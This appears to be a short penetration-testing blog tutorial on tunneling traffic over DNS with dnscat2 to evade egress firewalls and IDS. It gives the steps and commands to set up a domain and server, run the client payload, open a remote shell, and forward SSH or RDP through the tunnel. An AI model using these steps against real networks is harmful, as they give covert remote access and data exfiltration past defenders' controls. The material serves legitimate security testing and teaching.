Arr0way
- What is DNS Tunneling
- You Will Need
- Buying a Domain
- DNS Forwarding with Dnscat2
- Dnscat2 Port Forwarding
What is DNS Tunneling
DNS tunneling is used to evade egress firewall rules and/or IDS / proxy or other web filtering applicances by tunneling data over DNS. DNS tunneling usually works as external DNS resolution is available on most networks, it should be noted that DNS tunneling is slow due to the low amounts of data that can be transfered.
What You Will Learn:
- What is DNS tunneling
- How to setup dnscat2
- How to tunnel data over dnscat2
You Will Need
- A real world domain, NameSilo works well and has free WHOIS privacy.
- A VPS to run DNSCAT2 - Linode is cheap and works for this and this link will give you a $100 voucher (see instructions below)
In order to tunnel data over DNS a real world domain must be used and the domains authoritivate name servers must be set to servers in your control.
Buying a Domain
NameSilo offers free domain WHOIS privacy, a lot of extensions and is well priced.
How to Change Name Servers On NameSilo
Login to NameSilo and follow these instructions to change the authoritative name servers:
- Go to the Domain Manager page within your account
- Click the applicable domain name (it will be underlined in black)
- Click the “View/Manage Registered NameServers” link within the “NameServers” box
DNS Forwarding with Dnscat2
- Install dsncat2
apt-get install dnscat2 -y - Run:
dnscat2-server yourdomain.comon your VPS - From the client machine you will need to run the dnscat2 payload
- If your domain’s NS are configured correctly the session should be established
- Enter
session -ito spawn an interactive session - Launch a shell using
shell
Dnscat2 Port Forwarding
Dnscat2 supports TCP forwarding allowing you to tunnel SSH or RDP connections over the established DNS tunnel.
command (client) 4> listen 127.0.0.1:22 target:22 Again this will slow but functional.
Enjoy.